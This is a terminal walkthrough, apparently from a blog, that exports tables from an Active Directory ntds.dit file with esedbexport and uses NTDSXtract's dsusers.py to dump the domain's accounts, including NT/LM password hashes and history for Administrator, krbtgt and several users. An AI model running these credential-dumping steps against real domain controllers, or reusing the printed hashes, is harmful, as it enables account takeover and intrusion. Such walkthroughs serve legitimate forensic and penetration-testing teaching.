root@wpad:~/blog/libesedb-20120102# cd esedbtools/
root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport
esedbexport 20120102
Missing source file.
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file
Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ] [ -T table_name ] [ -hvV ] source
source: the source file
-c: codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h: shows this help
-l: logs information about the exported items
-m: export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t: specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T: exports only a specific table
-v: verbose output to stderr
-V: print version
root@wpad:~/blog/libesedb-20120102/esedbtools#
root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport ../../ntds.dit
esedbexport 20120102
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
Move the exported tables somewhere a bit easier to work with:
root@wpad:~/blog# cd NTDSXtract 1.0/
root@wpad:~/blog/NTDSXtract 1.0# ls
dscomputers.py dsdeletedobjects.py dsfileinformation.py dsgroups.py dstimeline.py dsusers.py framework ntds
root@wpad:~/blog/NTDSXtract 1.0# python dsusers.py
DSUsers
Extracts information related to user objects
usage: dsusers.py [option]
options:
--rid
List user identified by RID
--name
List user identified by Name
--passwordhashes
Extract password hashes
--passwordhistory
Extract password history
--certificates
Extract certificates
--supplcreds
Extract kerberos keys
--membership
List groups of which the user is a member
root@wpad:~/blog/NTDSXtract 1.0#
root@wpad:~/blog/NTDSXtract 1.0# python dsusers.py ../ntds.dit.export/datatable.3 ../ntds.dit.export/link_table.5 --passwordhashes ../SYSTEM.hive --passwordhistory ../SYSTEM.hive
Running with options:
Extracting password hashes
Extracting password history
Initialising engine...
Scanning database - 100% -> 3475 records processed
Extracting schema information - 100% -> 1549 records processed
Extracting object links...
List of users:
==============
Record ID: 3562
User name: Administrator
User principal name:
SAM Account name: Administrator
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 7ceee337-fa58-4ca0-9643-540a40161020
SID: S-1-5-21-3825330677-773554443-1603823854-500
When created: 2012-08-22 03:12:59
When changed: 2013-05-15 04:06:55
Account expires: Never
Password last set: 2012-08-22 02:49:42.899576
Last logon: 2013-05-15 04:08:04.547236
Last logon timestamp: 2013-05-15 04:06:55.577353
Bad password time 2013-06-07 02:34:34.560516
Logon count: 9
Bad password count: 1
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ net projectmentor Users Administrator
Password hashes:
Administrator:$NT$88e4d9fabaecf3ded18dd80905521b29:::
Password history:
Record ID: 3563
User name: Guest
User principal name:
SAM Account name: Guest
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 659723d7-1246-4959-b0fc-af80ea5e3816
SID: S-1-5-21-3825330677-773554443-1603823854-501
When created: 2012-08-22 03:12:59
When changed: 2013-03-14 06:54:22
Account expires: Never
Password last set: 2013-03-14 06:54:22.029303
Last logon: 2013-03-14 06:54:27.012817
Last logon timestamp: 2013-03-14 06:32:41.834022
Bad password time 2013-06-07 03:07:46.499917
Logon count: 0
Bad password count: 10
User Account Control:
PWD Not Required
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net projectmentor Users Guest
Password hashes:
Guest:$NT$823893adfad2ada6e1a414f3ebdf58f7:::
Password history:
Record ID: 3564
User name: user
User principal name:
SAM Account name: user
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: c5a5c87a-93b4-4d80-97a1-1c605b9b0c03
SID: S-1-5-21-3825330677-773554443-1603823854-1000
When created: 2012-08-22 03:12:59
When changed: 2013-06-07 02:51:54
Account expires: Never
Password last set: 2013-03-14 03:25:11.793912
Last logon: 2013-06-07 02:51:54.152191
Last logon timestamp: 2013-06-07 02:51:54.152191
Bad password time 2013-04-19 05:25:40.412670
Logon count: 67
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net projectmentor Users user
Password hashes:
user:$NT$88e4d9fabaecf3dec18dd80905521b29:::
Password history:
user_nthistory0:$NT$88e4d9fabafcf3dec18dd80905521b29:::
user_nthistory1:$NT$0c61031f010b2fbb88fe449fbf262477:::
user_nthistory2:$NT$88e4dffabaecf3dec18dd80905521b29:::
user_lmhistory0:c869027e01c3c4fe7626a90c87cc7fed:::
user_lmhistory1:8be023cd858da1edd21b94907afe182c:::
Record ID: 3610
User name: krbtgt
User principal name:
SAM Account name: krbtgt
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 74e6bd0b-e4d5-42df-98d5-24f9060061c9
SID: S-1-5-21-3825330677-773554443-1603823854-502
When created: 2012-08-22 03:16:03
When changed: 2012-08-22 03:31:13
Account expires: Never
Password last set: 2012-08-22 03:16:03.166457
Last logon: Never
Last logon timestamp: Never
Bad password time Never
Logon count: 0
Bad password count: 0
User Account Control:
Disabled
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ net projectmentor Users krbtgt
Password hashes:
krbtgt:$NT$7253e8647254716b507a2dcb149ff2da:::
Password history:
krbtgt_nthistory0:$NT$7253e86a7254716a507a2dcb149ff2da:::
krbtgt_lmhistory0:113926e06a31d182623633041b632929:::
Record ID: 3762
User name: John Doe
User principal name: jdoe@projectmentor.net
SAM Account name: jdoe
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: bbf24c63-39a9-4cc4-8aa8-933f9ddee940
SID: S-1-5-21-3825330677-773554443-1603823854-1104
When created: 2012-08-22 04:10:52
When changed: 2013-06-05 13:04:11
Account expires: Never
Password last set: 2013-04-19 07:11:49.849592
Last logon: 2013-06-07 02:56:25.677855
Last logon timestamp: 2013-06-05 13:04:11.674344
Bad password time 2013-05-02 03:01:12.536251
Logon count: 242
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net projectmentor Users John Doe
Password hashes:
John Doe:$NT$88e4d9fabaecf3ded18dd80905511b29:::
Password history:
Record ID: 3797
User name: Random User
User principal name: randy@projectmentor.net
SAM Account name: randy
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 2701eb29-628a-4568-a093-d33a7db10d04
SID: S-1-5-21-3825330677-773554443-1603823854-1108
When created: 2013-04-08 02:34:04
When changed: 2013-05-27 16:06:07
Account expires: Never
Password last set: 2013-04-19 06:59:25.423280
Last logon: 2013-04-08 02:34:10.482690
Last logon timestamp: 2013-04-08 02:34:10.482690
Bad password time Never
Logon count: 1
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net projectmentor Users Random User
Password hashes:
Random User:$NT$88ead9fa5aecf3dec18dd80905521b29:::
Password history:
root@wpad:~/blog/NTDSXtract 1.0#